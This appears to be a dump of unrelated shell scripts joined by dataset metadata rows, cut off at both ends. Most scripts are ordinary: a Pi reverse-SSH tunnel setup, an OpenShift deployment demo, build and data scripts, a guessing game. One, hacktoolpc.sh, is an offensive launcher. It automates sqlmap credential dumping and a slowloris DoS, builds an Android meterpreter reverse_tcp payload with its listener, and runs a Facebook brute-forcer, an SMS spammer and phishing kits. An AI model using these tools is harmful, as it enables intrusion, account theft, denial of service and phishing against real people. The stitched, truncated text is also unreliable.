mkdir -p /home/pi/.ssh
cp /boot/mtf/id_rsa /home/pi/.ssh/
cp /boot/mtf/id_rsa.pub /home/pi/.ssh/
cp /boot/mtf/id_rsa.pub /home/pi/.ssh/authorized_keys
chmod 600 /home/pi/.ssh/*
chmod 700 /home/pi/.ssh
chown -R 1000:1000 /home/pi/.ssh
fi
if [ -f /boot/mtf/ssh_server ] && [ -f /boot/mtf/autossh.sh ]
then
# get the server network name/ip
mtf_ssh_server=$(head -n 1 /boot/mtf/ssh_server)
# set the port based on the last two digits in the mac address
ssh_tunnel_port=52"$(printf %s "${mac}" | grep -o "[0-9]" | tr -d '\n'| tail -c 3)"
web_tunnel_port=58"$(printf %s "${mac}" | grep -o "[0-9]" | tr -d '\n'| tail -c 3)"
# write the ssh config for seamless connections to mtf_ssh_server
read -r -d '' \
MTFSSHCONFIG <<- EOF
Host mtf_ssh_tunnel
HostName ${mtf_ssh_server}
User pi
IdentityFile ~/.ssh/id_rsa
RemoteForward ${ssh_tunnel_port} 127.0.0.1:22
RemoteForward ${web_tunnel_port} 127.0.0.1:80
StrictHostKeyChecking no
ExitOnForwardFailure yes
ServerAliveInterval 60
ServerAliveCountMax 3
Host mtf_ssh_server
HostName ${mtf_ssh_server}
User pi
IdentityFile ~/.ssh/id_rsa
StrictHostKeyChecking no
EOF
# apply local ssh config
echo "$MTFSSHCONFIG"| tee "/home/pi/.ssh/config" >/dev/null
chown 1000:1000 /home/pi/.ssh/config
# Move exec wrapper script for service
mv /boot/mtf/autossh.sh /opt/mtf/bin/
# Move plugd action for auto ssh service
mv /boot/mtf/autossh.plugd /etc/ifplugd/action.d/autossh
# Write service template
echo "$MTFAUTOSSHSVC"| tee "/etc/systemd/system/autossh.service" >/dev/null
ln -s /etc/systemd/system/autossh.service /etc/systemd/system/multi-user.target.wants/autossh.service
systemctl start autossh.service &
fi
# Set Wifi to auto reconnect if we have the script to do it
if [ -f /etc/wpa_supplicant/ifupdown.sh ]
then
ln -s /etc/wpa_supplicant/ifupdown.sh /etc/ifplugd/action.d/ifupdown
fi
fi
| true
|
06abbfaaf30d4a32c6f2280dce597f9989be8593
|
Shell
|
ffirg/openshift
|
/bin/create-ose3-app-ab-deployment.sh
|
UTF-8
| 3,177
| 3.4375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Demo driver for an A/B (blue/green-style) rolling deployment on OpenShift v3.
# It builds "version 1" of an app, exposes it, then builds "version 2" as a
# second service, shifts traffic between them with oc scale, and finally
# retires version 1. Intended to be run interactively as a guided demo.
#
# Requires: the oc CLI, and helper functions run_cmd / run / check_build
# sourced from ../libs/functions (their exact semantics are defined there —
# presumably run_cmd/run echo-and-execute, check_build polls a build; verify
# against the library).
export APPNAME="ab-demo-app"
APPv1="version=1"
APPv2="version=2"
DEMO_USER="developer"
PROJECT="abdeployment"
SRC="https://github.com/ffirg/ab-deploy.git"
NAME="abdeploy.192.168.99.100.xip.io"
LABELS="versioning=true"
build_status="NULL"
pods=4
# include all our functions...
. ../libs/functions
# START
echo
echo "EXAMPLE OPENSHIFT v3 APP A-B ROLLING DEPLOYMENT"
echo "*** BEFORE STARTING ENSURE APP IS VERSION ONE on $SRC ***"
echo
run_cmd echo "First login into OSE (as $DEMO_USER user)..."
run_cmd run "oc login -u $DEMO_USER"
# setup project
run_cmd echo "Setup the $PROJECT project"
run_cmd run "oc new-project $PROJECT --description \"Rolling A-B Deployment Example\""
run_cmd run "oc project $PROJECT"
# do some dev work!
run_cmd echo "Create new app - let's call it \"$APPNAME\""
run_cmd run "oc new-app $SRC --name=${APPNAME} --labels=$APPv1"
# wait until the build is finished before going on...
check_build ${APPNAME}
run_cmd echo "Let's expose a route for the new service:"
VERSION="v1"
run_cmd run "oc expose service ${APPNAME} --name=${APPNAME}-${VERSION}"
run_cmd echo "Let's now scale up the service, to cope with more incoming load..."
oc scale dc/${APPNAME} --replicas=$pods
run_cmd echo "We should now have $pods pods running..."
run_cmd run "oc get pods"
run_cmd echo "We can check what we're hitting with a simple curl test:"
# Hit the v1 route 10 times; the awk pulls the route hostname (2nd column).
for i in {1..10}; do curl `oc get route|grep "${APPNAME}-${VERSION}"|awk '{print $2}'`; echo " "; done
# Make change to source code...
echo
run_cmd echo "GO MAKE A CHANGE TO THE SOURCE CODE @ ${SRC} and change VERSION 1 to VERSION 2 in index.php"
#run_cmd echo "Create a new version of our app..."
VERSION="v2"
run_cmd run "oc new-app $SRC --name=${APPNAME}-${VERSION} --labels=$APPv2"
# wait until the build is finished before going on...
check_build ${APPNAME}-${VERSION}
run_cmd echo "Check again the number of pods running..."
run_cmd run "oc get pods"
run_cmd echo "Let's expose a second route for the new version:"
#run_cmd run "oc expose service ${APPNAME}-v2 --name=${APPNAME}-v2 --hostname=v2.${NAME}"
run_cmd run "oc expose service ${APPNAME}-${VERSION} --name=${APPNAME}-${VERSION}"
run_cmd echo "and do the curl test again:"
#for i in {1..10}; do curl v2.${NAME}; echo " "; done
for i in {1..10}; do curl `oc get route|grep "${APPNAME}-${VERSION}"|awk '{print $2}'`; echo " "; done
run_cmd echo "Now let's scale down $APPv1 and $APPv2 up..."
# Split traffic: 2 replicas of v1 and 2 of v2 run side by side.
run_cmd run "oc scale dc/${APPNAME} --replicas=2"
run_cmd run "oc scale dc/${APPNAME}-v2 --replicas=2"
run_cmd echo "The curl test again:"
#for i in {1..10}; do curl v1.${NAME}; echo " "; done
#for i in {1..10}; do curl v2.${NAME}; echo " "; done
# NOTE: this grep matches BOTH routes (v1 and v2), so the loop curls
# whichever route line happens to come first — confirm that is intended.
for i in {1..10}; do curl `oc get route|grep "${APPNAME}"|awk '{print $2}'`; echo " "; done
run_cmd echo "Version 2 looks great, so let's rolls that out and retire version 1..."
# Cut over: v1 to zero replicas, v2 takes the full pod count.
run_cmd run "oc scale dc/${APPNAME} --replicas=0"
run_cmd run "oc scale dc/${APPNAME}-v2 --replicas=4"
run_cmd echo "We're now running only VERSION 2:"
#for i in {1..10}; do curl v2.${NAME}; echo " "; done
for i in {1..10}; do curl `oc get route|grep "${APPNAME}"|awk '{print $2}'`; echo " "; done
# THE END
| true
|
872ba2e8ea8d540cc968e9c517b93177412049dc
|
Shell
|
waggle-sensor/wagman
|
/boards/v4/firmware/regular_mode/firmware/flash-wagman
|
UTF-8
| 421
| 2.890625
| 3
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
# This file is part of the Waggle Platform. Please see the file
# LICENSE.waggle.txt for the legal details of the copyright and software
# license. For more details on the Waggle project, visit:
# http://www.wa8.gl

# Flash a firmware image onto a Wagman board using bossac.
#
# Arguments:
#   $1 - path to the firmware binary to write
#   $2 - serial port device (e.g. /dev/ttyACM0); bossac takes the port
#        name relative to /dev, hence the basename
firmware=$1
port=$2

if [ -z "$firmware" ] || [ -z "$port" ]; then
    # Usage errors belong on stderr so callers can capture real output cleanly.
    echo "usage: $0 firmware port" >&2
    exit 1
fi

# -i info, -d debug, -U true force USB detection, -e erase, -w write,
# -v verify, -R reset the board after flashing.
bossac -i -d --port="$(basename -- "$port")" -U true -e -w -v -b "$firmware" -R
| true
|
4b361db18019f0ad9bdb50394cdf49cb2b3b1361
|
Shell
|
hanulhan/LinuxScript
|
/StopPhilipsLogging.sh
|
UTF-8
| 817
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
# Stop the Philips logging session: read the PIDs of the putty, xterm and
# formatter processes that were recorded by the start script, and kill them.

CONFIG_FILE="/home/uli/Logging/Philips_putty_pid"

#Read LogFileName
#read -p "Filename: " LogFileName

# Read the config file. Without it there are no PIDs to kill, so abort
# instead of running `sudo kill` with empty arguments (original bug:
# the script fell through after printing the error).
echo "Reading config..." >&2
if [ ! -f "$CONFIG_FILE" ]; then
    echo "File $CONFIG_FILE not found!"
    exit 1
fi
source "$CONFIG_FILE" &>/dev/null
#echo $?
echo "Config for pidPutty: $pidPutty" >&2
echo "Config for pidXterm: $pidXterm" >&2
echo "Config for pidFormat: $pidFormat" >&2

# Stop the recorded processes (PIDs come from the sourced config).
echo "sudo kill $pidPutty"
sudo kill "$pidPutty"
echo "sudo kill $pidXterm"
sudo kill "$pidXterm"
echo "sudo kill $pidFormat"
sudo kill "$pidFormat"

#mv /home/uli/Logging/Philips.log /home/uli/Logging/${LogFileName}.log
#mv /home/uli/Logging/Philips_format.log /home/uli/Logging/${LogFileName}-format.log
#chown uli:uli /home/uli/Logging/${LogFileName}*
#chmod 775 /home/uli/Logging/${LogFileName}*
| true
|
4f6f42ff6c2047a6e79e46e4d563f7c00b8fe1d4
|
Shell
|
YungSang/vagrant-docker-review
|
/contrib/review
|
UTF-8
| 1,342
| 3.890625
| 4
|
[] |
no_license
|
#!/bin/bash
# Wrapper that runs Re:VIEW commands inside the yungsang/review Docker
# container. Must be invoked from somewhere under the review-projects folder
# (which is volume-mounted into the container).
#
# Fix: the script uses bash-only constructs ([[ ... == glob ]]), so the
# shebang must be bash, not /bin/sh (fails on dash-based systems).

# Print the list of supported subcommands.
print_usage() {
  echo "Usage: $(basename $0) <command> [<arguments...>]"
  echo
  echo "command:"
  echo "  catalog-converter | review-catalog-converter"
  echo "  check             | review-check"
  echo "  checkdep          | review-checkdep"
  echo "  compile           | review-compile"
  echo "  epubmaker         | review-epubmaker"
  echo "  epubmaker-legacy  | review-epubmaker-legacy"
  echo "  index             | review-index"
  echo "  init              | review-init"
  echo "  pdfmaker          | review-pdfmaker"
  echo "  preproc           | review-preproc"
  echo "  validate          | review-validate"
  echo "  vol               | review-vol"
  echo
  echo "  bash (or other linux commands)"
}

CMD="$1"

if [ -z "$CMD" ] ; then
  print_usage >&2
  exit 1
fi

shift

# Accept the short aliases and expand them to the full review-* names;
# anything else (e.g. "bash") is passed through unchanged.
case "$CMD" in
  "catalog-converter" | "check" | "checkdep" | "compile" | "epubmaker" | "epubmaker-legacy" | "index" | "init" | "pdfmaker" | "preproc" | "validate" | "vol" ) CMD="review-${CMD}";;
esac

# Strip everything before /review-projects/ so the path maps to the
# container's mount point.
DIR=$(pwd | sed -e "s/^.*\(\/review-projects\/.*\)\$/\1/")

if [[ "$DIR" == /review-projects/* ]]; then
  docker run -it --rm -v /vagrant/review-projects:/review-projects yungsang/review \
    sh -c "cd $DIR && $CMD $*"
else
  echo "$(basename $0) must be executed under the review-projects folder." >&2
  echo >&2
  print_usage >&2
  exit 3
fi
| true
|
a2f6f6934a3cb4c189a09f3816be54a216a276d9
|
Shell
|
mikeyhu/GoRSS
|
/server/ops/test-stop.sh
|
UTF-8
| 152
| 2.9375
| 3
|
[] |
no_license
|
#!/bin/bash
# Stop the test MongoDB instance whose PID was recorded in the pidfile.
echo "Stopping test mongo"
pidfile="test/resources/database.pid"
if [ -f "$pidfile" ]
then
    # Read the PID first, remove the pidfile, then terminate the process.
    # Quoting and $(...) replace the original unquoted backtick form.
    PID=$(cat "$pidfile")
    rm -- "$pidfile"
    kill "$PID"
fi
| true
|
9b1fc360128fd26a79d36f3c3854b41f84963e8a
|
Shell
|
mariosbikos/ceid-projects
|
/opsys12b/run_tests.sh
|
UTF-8
| 963
| 4
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Launch N client processes against the running server and optionally
# summarise (via the -a/-b/-v flags) how many colas were distributed.

# Print usage/help text to stdout.
usage(){
cat << EOF
Usage: $0 [OPTIONS] {amount of clients}
OPTIONS
-a grep output for how many cokes were given
-b grep output for how many clients got colas
-v grep output for verbose representation of colas distribution on clients
NOTE
For easy monitoring of the server process
watch -n 0.1 "ps -eLf|grep ' server'"
EXAMPLE
./run_tests.sh -abv 100
EOF
}

# Spawn $1 client processes in the background and wait for all of them.
clients(){
for i in $(seq 1 "$1")
do
./client 1 &
done
wait $(jobs -p)
}

#if argument is not supplied, call usage
[[ $# -eq 0 ]] && usage
#if one argument is supplied without options
if [[ $# -eq 1 ]]; then
clients "${@: -1}"
else
# Capture client output once, then each flag filters it.
output=$(clients "${@: -1}");
while getopts :abv opt; do
case $opt in
a) echo -n 'Coca colas given: ';
   echo "$output"|grep cola|wc -l ;;
b) echo -n 'Clients that got colas: ';
   echo "$output"|grep cola|uniq -c|wc -l ;;
v) echo "$output"|grep cola|uniq -c ;;
# BUG FIX: the original arm was `Invalid option -$OPTARG >&2` with no
# echo, which tried to EXECUTE a command named "Invalid".
\?) echo "Invalid option -$OPTARG" >&2 ;;
esac
done
fi
| true
|
27125cd79187c3808e04aef3be3cf6a9bc8e1706
|
Shell
|
ualsg/global-building-morphology-indicators
|
/query_templates/c1-gbmi/end_to_end_database.sh
|
UTF-8
| 1,327
| 3.21875
| 3
|
[
"CC-BY-4.0"
] |
permissive
|
#!/bin/bash
# End-to-end GBMI pipeline for one database: run setup/OSM/GADM scripts,
# then, for each population raster, the full chain of table-building and
# export scripts. The {{ database }} placeholder is filled in by templating.

database="{{ database }}"

declare -a raster_names=('worldpop2020_1km' 'worldpop2020_100m')

declare -a commands=(\
"bash ./db_setup_${database}.sh" \
"bash ./osm_gadm_tables_${database}.sh")

for cmd in "${commands[@]}"; do
  # printf instead of echo "\n ..." — the original printed a literal \n.
  printf '\n %s\n' "${cmd}"
  eval "$cmd"
done

for raster_name in "${raster_names[@]}"; do
  # Compute neighbour table, neighbour indicators within buffer
  # BUG FIX: removed a stray backtick that followed the base_tables
  # element and corrupted the array / shell parsing.
  declare -a commands=(\
  "bash ./raster_tables_by_${raster_name}_${database}.sh" \
  "bash ./base_tables_by_${raster_name}_${database}.sh" \
  "bash ./geoms_tables_by_${raster_name}_${database}.sh" \
  "bash ./neighbours_tables_by_${raster_name}_${database}.sh" \
  "bash ./neighbours_tables_by_${raster_name}_centroid_${database}.sh" \
  "bash ./final_tables_by_${raster_name}_${database}.sh" \
  "bash ./final_tables_by_${raster_name}_centroid_${database}.sh" \
  "bash ./export_${raster_name}_${database}.sh" \
  "bash ./export_tiff_${raster_name}_${database}.sh")
  # The 100m raster is too heavy for these large extracts — skip it.
  if [[ "${database}" == "planet" || "${database}" == "argentina" || "${database}" == "new_zealand" || "${database}" == "switzerland" ]] && [[ "${raster_name}" == "worldpop2020_100m" ]]; then
    echo "Skipping ${raster_name} for ${database}."
  else
    for cmd in "${commands[@]}"; do
      echo "$cmd"
      eval "$cmd"
    done
  fi
done
| true
|
d5e908274f5b8b39c99d0a9165fc247ebc779bf4
|
Shell
|
anonymous-sys19/Hacktoolpc
|
/hacktoolpc.sh
|
UTF-8
| 9,525
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
#Politica y Privicidad »»»» HACKER-PC
echo -e "----> ESTE SCRIPT ESTA EN DESARROLLO PRONTO AGREGARE UN MENU <----"
sleep 3
clear
function limpiar_pantalla {
clear
}
limpiar_pantalla
while :
do
opcion=0
echo
echo
echo -e " \e[0;34m ::: ::: ::: :::::::: ::: :::::::::::::::::::::: ::::::::: :::::::: \e[0m"
echo -e " \e[0;34m :+: :+: :+: :+: :+: :+::+: :+: :+: :+: :+: :+: :+::+: :+: \e[0m"
echo -e " \e[0;34m +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:++:+ \e[0m"
echo -e " \e[0;34m +#++:++#+++#++:++#++:+#+ +#++:++ +#++:++# +#++:++#: +#++:++#++:+++#++:++#+ +#+ \e[0m"
echo -e " \e[0;34m +#+ +#++#+ +#++#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ \e[0m"
echo -e " \e[0;34m #+# #+##+# #+##+# #+##+# #+# #+# #+# #+# #+# #+# #+# \e[0m"
echo -e " \e[0;34m### ###### ### ######## ### ################ ### ### ######## \e[0m"
echo
echo
echo -e " \e[0;34m 01 \e[31mNmap\e[0;34m" " Simple comando NMAP "
echo -e " \e[0;34m 02 \e[31mSqlmap\e[0;34m" " SQLmap automatizado con todos los comandos puede demmorar el scan ... "
echo -e " \e[0;34m 03 \e[31mDdoS-slowloris.pl\e[0;34m" " Pre instalado el original slowloris y pre configurado para un ataque mas potente ... "
echo -e " \e[0;34m 04 \e[31mPayload-android\e[0;34m" " Un solo PAYLOAD automatizado y te dejara msfconsole en modo escucha ... "
echo -e " \e[0;34m 05 \e[31mXSSTRIKE\e[0;34m" " XSStrike un potente scan de vulnerabilidades xss el mas completo ... "
echo -e " \e[0;34m 06 \e[31mGross-fb\e[0;34m" " Un script que te ayudara a Crackear cuentas de facebook servible hasta hoy ... "
echo -e " \e[0;34m 07 \e[31mGOOD-KILLER\e[0;34m" " Script good-killer herramienta que envia sms-spam 1 SmS por dia ... "
echo -e " \e[0;34m 08 \e[31mZphisher\e[0;34m" " zphisher script profecional para phishing ... "
echo -e " \e[0;34m 09 \e[31mAIOPhish\e[0;34m" " aiophish un completo script para phishing ... "
echo -e " \e[0;34m 10 \e[31mmas herramientasde hacking\e[0;34m" "Es un listado de mas herramientas alojadas esta nueva actualizacion"
echo -e " \e[0;34m 99 \e[31m\e[5mSalir\n\e[25m"
echo -e -n "\e[32m Ingrese un valor :> "
read opcion
case $opcion in
1)
function limpiar_pantalla {
clear
}
trap ctrl_c INT
function ctrl_c() {
echo -e "\e[0;31m SALIENDO DEL SCRIPT\e[0m"
sleep 2s
limpiar_pantalla
exit 0
}
nmap
echo "Este proseso podria tardar por el escaneo ..."
read -p "INGRESE SU IP O PAGINA WEB > " v
sudo nmap --top-ports 25 $v/24
read enterkey
;;
2)
function limpiar_pantalla {
clear
}
trap ctrl_c INT
function ctrl_c() {
echo -e "\e[0;31m SALIENDO DEL SCRIPT\e[0m"
sleep 2s
limpiar_pantalla
exit 0
echo "volviendo al menu "
bash Hacker-pc.sh
}
sqlmap
echo -e "secuencia sqlmap\n"
echo
read -p "Citio web, IP > " o
sudo sqlmap -u "$o" --random-agent --current-db --level=5 --dbms=Mysql
echo
read -p "Enter dbs > " s
sudo sqlmap -u $o --random-agent --level=5 --dbms=Mysql -D $s --tables
echo
read -p "your user > " e
sudo sqlmap -u $o --random-agent --level=5 --dbms=Mysql -D $s -T $e --columns
echo
read -p "el pass y id dela pagina > " pass usr
sudo sqlmap -u $o --random-agent --level=5 --dbms=Mysql -D $s -T $e -C $pass,$usr --dump
read enterkey
;;
3)
function limpiar_pantalla {
clear
}
trap ctrl_c INT
function ctrl_c() {
echo -e "\e[0;31m SALIENDO DEL SCRIPT\e[0m"
sleep 2s
limpiar_pantalla
exit 0
bash Hacker-pc.sh
echo "volviendo al menu "
}
for slowloris in output
do
cd output
limpiar_pantalla
git clone https://github.com/Ogglas/Orignal-Slowloris-HTTP-DoS.git
limpiar_pantalla
chmod 777 -R Orignal-Slowloris-HTTP-DoS
cd Orignal-Slowloris-HTTP-DoS
perl slowloris.pl
echo -e " \e[0;34m\e[5mCrack ingresa la URL a atacar\e[25m"
read url
echo -e " \e[0;34m\e[5mPuerto\e[25m"
read p
echo -e " \e[0;34m\e[5mTimeout\e[25m"
read t
limpiar_pantalla
echo -e " \e[0;34m\e[5mCAGANDONOS EN LA PUTA MADRE CRACK\e[25m "
sleep 3
perl slowloris.pl -dns $url -port $p -timeout -num $t -cache
done
read enterkey
;;
4)
function limpiar_pantalla {
clear
}
trap ctrl_c INT
function ctrl_c() {
echo -e "\e[0;31m SALIENDO DEL SCRIPT\e[0m"
sleep 2s
limpiar_pantalla
exit 0
echo "volviendo al menu "
bash Hacker-pc.sh
}
echo -e "\e[0;31m___________________________\e[0;34m___________________________________\e[0m"
echo -e "\e[0;31m ██╗ ██╗ █████╗ ██████╗ \e[0;34m ██╗ ██ ║ ███████╗ ██████╗ \e[0m"
echo -e "\e[0;31m ██║ ██║ ██╔══██╗ ██╔════╝\e[0;34m ██║ ██╔╝ ██╔════╝ ██╔══██╗ \e[0m"
echo -e "\e[0;31m ███████║ ███████║ ██║Anoni\e[0;34mmo█████╔╝ █████╗ ██████╔╝ \e[0m"
echo -e "\e[0;31m ██╔══██║ ██╔══██║ ██║ \e[0;34m ██╔═██╗ ██╔══╝ ██╔══██╗ \e[0m"
echo -e "\e[0;31m ██║ ██║ ██║ ██║╚██████╗ \e[0;34m ██║ ██╗ ███████╗ ██║ ██║ \e[0m"
echo -e "\e[0;31m ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ \e[0;34m ╚═╝ ╚═╝ ╚══════╝ ╚═ ╚═╝ \e[0m"
echo -e "\e[0;31m \e[0;34m \e[0m"
echo -e "\e[0;31m A n o\e[0;34m n i m o \e[0m"
echo -e "\e[3;34mDERECHOS-DE-AUTOR->>>\e[0;31mHACKER-PC\e[0m"
sleep 2s
echo -e "\e[1;31mVAMOS-A-CREAR-UN-PAYLOAD-ANDROID ... \e[0m"
sleep 3s
echo -n -e "\e[0;31mDIRECCION-IP\e[0m"
read ip
echo -n -e "\e[0;31mPUERTO\e[0m"
read puerto
read -p "\e[0;31mNombre de la aplicacion :" o
limpiar_pantalla
echo -e "\e[3;33mcreando aplicacion \e[0m"
msfvenom -p android/meterpreter/reverse_tcp lhost=$ip lport=$puerto R > $o.apk
echo -e "\e[1;33mCreado con-\e[0m-\e[0;31m-EXITO\e[0m"
sleep 2s
echo -e "\e[0;34mConectando a postgresql\e[0m"
sudo service postgresql start
echo -e "\e[0;34mConectado con exito\e[0m"
sleep 2s
echo -e "\e[0;31mABRIENDO METASPLOIT\e[0m"
sleep 2s
limpiar_pantalla
msfconsole -x "use multi/handler;\
set PAYLOAD android/meterpreter/reverse_tcp;\
set LHOST $ip;\
set LPORT $puerto;\
exploit"
read enterkey
;;
5)
function limpiar {
clear
}
trap ctrl_c INT
function ctrl_c() {
echo -e "\e[0;31m SALIENDO DEL SCRIPT\e[0m"
sleep 2s
limpiar_pantalla
exit 0
echo "volviendo al menu "
bash Hacker-pc.sh
}
for XSStrike in output
do
function limpiar_pantalla {
clear
}
cd output
limpiar_pantalla
git clone https://github.com/s0md3v/XSStrike.git
chmod 777 -R XSStrike
limpiar_pantalla
cd XSStrike
python3 xsstrike.py
echo -e "comandos a agregar para el escaneo " URL
read url
python3 xsstrike.py $URL
done
read enterkey
;;
6)
trap ctrl_c INT
function ctrl_c() {
echo -e "\e[0;31m SALIENDO DEL SCRIPT\e[0m"
sleep 2s
limpiar_pantalla
exit 0
echo "volviendo al menu "
}
for Grossfb in output
do
function limpiar_pantalla {
clear
}
cd output
limpiar_pantalla
git clone https://github.com/Antraxmx/Gross-FB.git
chmod 777 -R Gross-FB
limpiar_pantalla
cd Gross-FB
limpiar_pantalla
echo -e " \e[0;31m\e[5mCrackPress enter \e[0m"
echo -e " \e[0;34mIngresa correo dela victima"
read c
echo -e " \e[0;34mIngresa ruta de tu diccionario"
read d
perl gross.pl $c $d
done
read enterkey
;;
7)
function limpiar_pantalla {
clear
}
trap ctrl_c INT
function ctrl_c() {
echo -e "\e[0;31m SALIENDO DEL SCRIPT\e[0m"
sleep 2s
limpiar_pantalla
exit 0
bash Hacker-pc.sh
echo "volviendo al menu "
}
for Goodkiller in output
do
cd output
limpiar_pantalla
git clone https://github.com/FDX100/GOD-KILLER.git
chmod 777 -R GOD-KILLER
limpiar_pantalla
cd GOD-KILLER
chmod 777 -R install.py
python install.py "
y"
GOD-KILLER
done
read enterkey
;;
8)
trap ctrl_c INT
function ctrl_c() {
echo -e "\e[0;31m SALIENDO DEL SCRIPT\e[0m"
sleep 2s
limpiar_pantalla
exit 0
}
for Zphisher in output
do
function limpiar_pantalla {
clear
}
cd output
printf " INICIANDO INSTALACION DE REQUERIMENTOS " " "
apt install git curl php wget -y
printf "INSTALADAS CON EXITO"
limpiar_pantalla
git clone git://github.com/htr-tech/zphisher.git
chmod 777 -R zphisher
limpiar_pantalla
cd zphisher
bash zphisher.sh
done
read enterkey
;;
9)
trap ctrl_c INT
function ctrl_c() {
echo -e "\e[0;31m SALIENDO DEL SCRIPT\e[0m"
sleep 2s
limpiar_pantalla
exit 0
}
for AIOPhish in output
do
function limpiar_pantalla {
clear
}
cd output
limpiar_pantalla
git clone https://github.com/DeepSociety/AIOPhish
chmod 777 -R AIOPhish
limpiar_pantalla
cd AIOPhish
./aiophish
done
read enterkey
;;
10)
function hackingtool-pc {
cd HCK
bash HCK.sh
}
hackingtool-pc
read enterkey
;;
99)
clear
exit 0
read enterkey
;;
*) echo "la opcion no esta e n la lista"
read enterkey
;;
esac
done
| true
|
6d6e9ff7f3f0b77725e8320c42a5ae91db05ac0c
|
Shell
|
UVoggenberger/CEUAS
|
/CEUAS/public/harvest/code/download/odbgz.ksh
|
UTF-8
| 1,065
| 3.53125
| 4
|
[
"CC-BY-4.0",
"NetCDF"
] |
permissive
|
#!/bin/ksh
# -----------------------------------------------------------------------------
# This code has been developed in the service contract for C3S
#
# script for converting odb station files into gzipped ASCII format
#
# Limits for n should be adjusted depending on the server capacity
#
# (c) University of Vienna, L. Haimberger, Vienna, Austria
# Copernicus Climate Change Service, 2020
# https://apps.ecmwf.int/datasets/licences/copernicus/
# email leopold.haimberger (at) univie.ac.at
# Last Modifed: 23 January, 2020
# -----------------------------------------------------------------------------
# Iterate over the era5 conv files (excluding NetCDF outputs).
for file in $(ls era5.*conv.* | grep -v '.nc'); do
echo $file
# Split the filename into prefix (chars 1-14) and suffix (chars 16-23).
fil=$(echo $file | cut -c 1-14)
suff=$(echo $file | cut -c 16-23)
echo $fil,$suff
# Count currently running "odb sql" conversions (NOTE(review): this ps|grep
# count presumably also matches the grep process itself — verify).
n=$(ps u | grep 'odb sql' | wc -l)
echo $n
# NOTE(review): the rm below makes the following -f test always succeed,
# i.e. every file is (re)converted; looks like a debug leftover — confirm.
rm ${fil}._$suff.gz
if [ ! -f ${fil}._$suff.gz ]; then
# Throttle: wait while more than 20 conversions are already running.
while [[ $n -gt 20 ]]; do
sleep 5
n=$(ps u | grep 'odb sql' | wc -l)
echo $n
done
# Dump the ODB as ASCII, strip spaces, gzip; run in the background.
time odb sql -q 'select *' -i ${file} | tr -d " " | gzip >${fil}._${suff}.gz &
fi
done
| true
|
6053742a402fdc1d00f19ed565e48931f3e07201
|
Shell
|
WALL-E/darts
|
/install.sh
|
UTF-8
| 183
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/bash
# Install Node.js plus the JS test dependencies (jasmine, frisby).
# The script must run as root because it uses yum and a global npm install.

if [ "$(id -u)" -ne 0 ]
then
    echo "运行脚本需要root权限"
    exit 1
fi

# System runtime, then the global test runner, then the local HTTP test lib.
yum install -y nodejs
npm install -g jasmine
npm install --save-dev frisby
| true
|
d03deaac2766a9a798a3b3845fa185512b354a2c
|
Shell
|
MCalazans/crypto-infrastructure-demo
|
/mcalazans/dwarfs-forge/scripts/install-monitoring.sh
|
UTF-8
| 1,061
| 3.34375
| 3
|
[] |
no_license
|
#!/bin/bash
# Provision AWS monitoring helpers on an Amazon Linux host:
#   1. CloudWatch monitoring scripts (perl-based) into /opt/aws-scripts-mon
#   2. the Amazon SSM agent
#   3. the CloudWatch Logs agent (awslogs)
# Must run as root (yum, writes under /opt).
set -eu
PATH="/usr/sbin:/sbin:/usr/bin:/bin:/usr/local/bin"
CLOUDWATCH_MONITORING_SCRIPTS="CloudWatchMonitoringScripts-1.2.2.zip"
echo "**** Installing Monitoring Helpers"
# AWS specific configuration
echo "** Installing CloudWatch helper scripts"
echo "WARNING: This script will NOT add to crontab. You must add it using USERDATA."
# Idempotency guard: skip the download/unzip if already installed.
[[ -d /opt/aws-scripts-mon ]] || {
# Install required tools for Amazon Linux
yum install -q -y perl-Switch perl-DateTime perl-Sys-Syslog perl-LWP-Protocol-https perl-Digest-SHA.x86_64
# Download and Install script
cd /opt
wget -q "http://aws-cloudwatch.s3.amazonaws.com/downloads/${CLOUDWATCH_MONITORING_SCRIPTS}"
unzip -q "${CLOUDWATCH_MONITORING_SCRIPTS}"
rm "${CLOUDWATCH_MONITORING_SCRIPTS}"
}
echo "** Downloading amazon ssm agent"
cd /tmp
curl -s https://amazon-ssm-us-east-1.s3.amazonaws.com/latest/linux_amd64/amazon-ssm-agent.rpm -o amazon-ssm-agent.rpm
# Remove any repo-installed agent first, then install the freshly
# downloaded rpm so the pinned version wins.
yum remove -y -q amazon-ssm-agent
yum install -y -q amazon-ssm-agent.rpm
echo "** Installing CloudWatch Logs agent"
yum install -y -q awslogs
|
a78dba4043357ebc74a009f99ad7d9e7116ca2ee
|
Shell
|
EL-R/EL-Repo
|
/guessinggame.sh
|
UTF-8
| 550
| 3.5625
| 4
|
[] |
no_license
|
# Guessing game: the player must guess how many files the repository
# contains (the answer is 3). Loops until the correct number is entered.
echo "Welcome"
# Typo fixes in the user-facing prompts ("gess" -> "guess", grammar).
echo "Try to guess how many files this repository contains"
echo "Keep in mind it's not many))"

# Prompt the player and read the next guess into $res1.
# (read -r so a stray backslash in the input is taken literally.)
function A {
echo "Please type any number"
read -r res1
}

A
while [[ $res1 -ne 3 ]]
do
echo "You chose $res1"
if [[ $res1 -gt 10 ]]
then
# Typo fix: original said "It's too mach value".
echo "It's too big a value. I give a hint: the value is not more than 10. Try again"
elif [[ $res1 -gt 3 ]]
then
echo "It's a big value. Try again"
else
echo "It's a small value. Try again"
fi
A
done
echo "You chose $res1"
echo "You are right! I have $res1 files in my repository."
| true
|
269f9e6a409f3d915c2a277d2b4d6f12d0d970f9
|
Shell
|
mananchhatriwala/hello-world
|
/Deployment/InitW1/TestInstallation/scripts/startservers.sh
|
UTF-8
| 5,079
| 3.015625
| 3
|
[] |
no_license
|
#!/bin/sh
# Is user specifies INSTALL_DB then create a new DB
# If user specifies DB_USER, then a user will be created
# DB_NAME
# DB_USER
# DB_PASS
# if the flag INSTALL_DB is specified and true
# install db
#
# NOTE(review): this script is NOT valid shell as written. The pattern
# "if ... ; then && \" (and "fi && \", "exit && \") is a syntax error —
# `&&` cannot follow `then`/`fi` directly — so the block below will not
